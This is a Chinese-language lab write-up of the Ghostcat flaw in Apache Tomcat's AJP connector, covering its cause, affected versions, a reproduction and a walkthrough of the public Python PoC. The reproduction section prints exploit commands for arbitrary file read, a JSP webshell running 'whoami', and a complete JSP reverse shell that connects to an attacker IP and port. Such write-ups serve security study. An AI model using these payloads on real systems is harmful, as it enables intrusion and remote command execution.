一、漏洞描述

Apache Tomcat是由Apache软件基金会属下Jakarta项目开发的Servlet容器.默认情况下,Apache Tomcat会开启AJP连接器,方便与其他Web服务器通过AJP协议进行交互.但Apache Tomcat在AJP协议的实现上存在漏洞,导致攻击者可以通过发送恶意的AJP请求,可以读取或者包含Web应用根目录下的任意文件,如果配合文件上传任意格式文件，将可能导致任意代码执行(RCE).该漏洞利用AJP服务端口实现攻击,未开启AJP服务对外不受漏洞影响（tomcat默认将AJP服务开启并绑定至0.0.0.0/0）.

二、危险等级

高危

三、漏洞危害

攻击者可以读取 Tomcat所有 webapp目录下的任意文件。此外如果网站应用提供文件上传的功能，攻击者可以先向服务端上传一个内容含有恶意 JSP 脚本代码的文件（上传的文件本身可以是任意类型的文件，比如图片、纯文本文件等），然后利用 Ghostcat 漏洞进行文件包含，从而达到代码执行的危害

四、影响范围

Apache Tomcat 9.x < 9.0.31

Apache Tomcat 8.x < 8.5.51

Apache Tomcat 7.x < 7.0.100

Apache Tomcat 6.x

五、前提条件

对于处在漏洞影响版本范围内的 Tomcat 而言，若其开启 AJP Connector 且攻击者能够访问 AJP Connector 服务端口的情况下，即存在被 Ghostcat 漏洞利用的风险。注意 Tomcat AJP Connector 默认配置下即为开启状态，且监听在 0.0.0.0:8009 。

六、漏洞原理

Tomcat 配置了两个Connector，Connector组件的主要职责就是负责接收客户端连接和客户端请求的处理加工。它们分别是 HTTP 和 AJP ：HTTP默认端口为8080，处理http请求，而AJP默认端口8009，用于处理 AJP 协议的请求，而AJP比http更加优化，多用于反向、集群等，漏洞由于Tomcat AJP协议存在缺陷而导致。

攻击者利用该漏洞可通过构造特定参数，读取服务器webapp下的任意文件以及可以包含任意文件，如果有某上传点，上传图片马等等，即可以获取shell。

浏览器不能直接支持AJP协议。所以实际通过Apache的proxy_ajp模块进行反向代理，暴露成http协议（8009端口）给客户端访问

相关的配置文件在conf/server.xml。

构造两个不同的请求，经过tomcat内部处理流程，一个走default servlet(DefaultServlet)，另一个走jsp servlet(JspServlet)，可导致的不同的漏洞。

文件读取漏洞走的是DefaultServlet，文件包含漏洞走的是JspServlet。

七、部署靶机环境

靶机：ubuntu22.04

配置：可以看看这个，无脑操作（当然可以使用docker）

在 Ubuntu 20.04 上安装 Apache Tomcat 教程 - Bandwagonhost中文网-Bandwagonhost中文网

攻击机：Linux kali2023

八、复现过程

1、探测IP

2、任意文件读取

下载Exp：

git clone https://github.com/YDHCUI/CNVD-2020-10487-Tomcat-Ajp-lfi

cd CNVD-2020-10487-Tomcat-Ajp-lfi/

chmod +x CNVD-2020-10487-Tomcat-Ajp-lfi.py 

读取文件内容（-f后即是指定的文件）：

python2 CNVD-2020-10487-Tomcat-Ajp-lfi.py 192.168.155.184 -p 8009 -f WEB-INF/web.xml

Python2 CNVD-2020-10487-Tomcat-Ajp-lfi.py 192.168.155.184 -p 8009 -f index.jsp

3.任意文件包含（这个需要结合文件上传漏洞）

这里自己上传了一个木马到ROOT目录：test.txt

脚本内容：

<%out.println(new java.io.BufferedReader(new java.io.InputStreamReader(Runtime.getRuntime().exec("whoami").getInputStream())).readLine());%>

访问一下是可达的

修改Poc：

主要是这，将/asdf改成/asdf.jspx

执行脚本

python2 cvefileinclude.py 192.168.155.184 -p 8009 -f test.txt

成功

尝试反弹shell:

脚本：

<%@page import="java.lang.*,  java.util.*,  java.io.*,  java.net.*"%>

<%

try {

    String host = "192.168.155.166";

    int port = 9001;

    Socket socket = new Socket();

    socket.connect(new  InetSocketAddress(host, port), 2000);

   

    Process process;

    if (System.getProperty("os.name").toLowerCase().contains("win"))  {

        process = new ProcessBuilder("cmd.exe").redirectErrorStream(true).start();

    } else {

        process = new ProcessBuilder("/bin/sh").redirectErrorStream(true).start();

    }

   

    InputStream  pin = process.getInputStream();

    InputStream  perr = process.getErrorStream();

    OutputStream pout = process.getOutputStream();

   

    InputStream  sin = socket.getInputStream();

    OutputStream sout = socket.getOutputStream();

   

    while(!socket.isClosed())  {

        while(pin.available()  > 0)  sout.write(pin.read());

        while(perr.available()  > 0) sout.write(perr.read());

        while(sin.available()  > 0)  pout.write(sin.read());

        sout.flush();

        pout.flush();

    }

    process.destroy();

    socket.close();

} catch (Exception e) {}

%>

九、POC解析

（一）引入的包及作用

1、struct:用于处理二进制数据，AJP协议基于二进制

2、socket:建立与Tomcat服务器的AJP端口的TCP连接，发送构造的恶意请求并接收响应。

3、argparse:解析命令行参数

4、StringIO（隐式引入）:在AjpForwardRequest.parse() 中，用于将二进制数据流转换为类文件对象，便于流式解析

（二）函数

Pack_strings:函数

将字符串 s 按特定二进制格式序列化：[2字节长度] + [字符串字节数据] + [1字节的0]

       >h： 表示大端（Big-endian）的有符号短整数（2字节）

       >H：大端的无符号短整数（2字节）

       %ds：动态长度的字节串（例如 5s 表示 5 字节），对应 s 的 UTF-8 编码数据。

        b：一个有符号字节（1字节），固定为 0

大端序是最高有效字节在前，小端是最低有效字节在前。AJP协议是基于TCP的，而网络传输通常采用大端序，也就是网络字节序。同时Tomcat AJP协议（Apache JServ Protocol）明确要求所有字段以大端序编码，且字符串以 \0 结尾

Unpack函数

解包二进制数据，返回一个元组

计算需要读取的字节数à读取字节à按照格式解析读取到的字节

unpack_string函数

从二进制流中解析 AJP 协议格式字符串，记住前两个字节表示整个字节流的长度

（三）类

AjpBodyRequest类

处理客户端与服务器之间的数据传输

数据传输方向：

读取字节à空则返回数据头，非空则添加数据长度à根据方向拼接数据并返回

循环发送数据块 → 等待服务器指令 → 根据指令决定是否继续发送

GET_BODY_CHUNK：表示对方要求发送下一个数据块（用于分片传输）。

SEND_HEADERS：表示对方已发送响应头，需结束数据传输。

len(data) == 4：表示空包

AjpForwardRequest类

构造和发送AJP请求到目标服务器

分配数值标识符，AJP协议要求将HTTP方法以数值而不是字符串形式传输

后面定义标准请求头和请求属性

SC_REQ：该头是 AJP协议预定义的标准头

区分预定义头和自定义头，将HTTP请求头按AJP协议规范序列化为二进制数据

若属性名为req_attribute，表示这是一个嵌套属性，其值需拆分为两个部分（名，值）à打包属性（名）值。看到这里可以基本明白漏洞原理。

AJP 协议未对 javax.servlet.include.* 属性进行安全校验，攻击者通过伪造请求头实现 路径穿越。通过设置req_attribute 属性，注入恶意路径，触发 Tomcat 解析任意文件，从而泄露敏感信息。例如：{'name':'req_attribute', 'value':['javax.servlet.include.path_info', 'WEB-INF/web.xml']},

在属性列表末尾添加 0xFF，表示 属性序列结束

Serialize函数：生成二进制数据包

Parse函数：解析接收到的AJP协议数据包，将其转换为结构化的请求对象

send_and_receive函数：处理AJP协议的请求发送和响应接收

参数传入

/asdf 是用于触发 AJP 文件包含漏洞的任意路径，实现路径覆盖，访问目标文件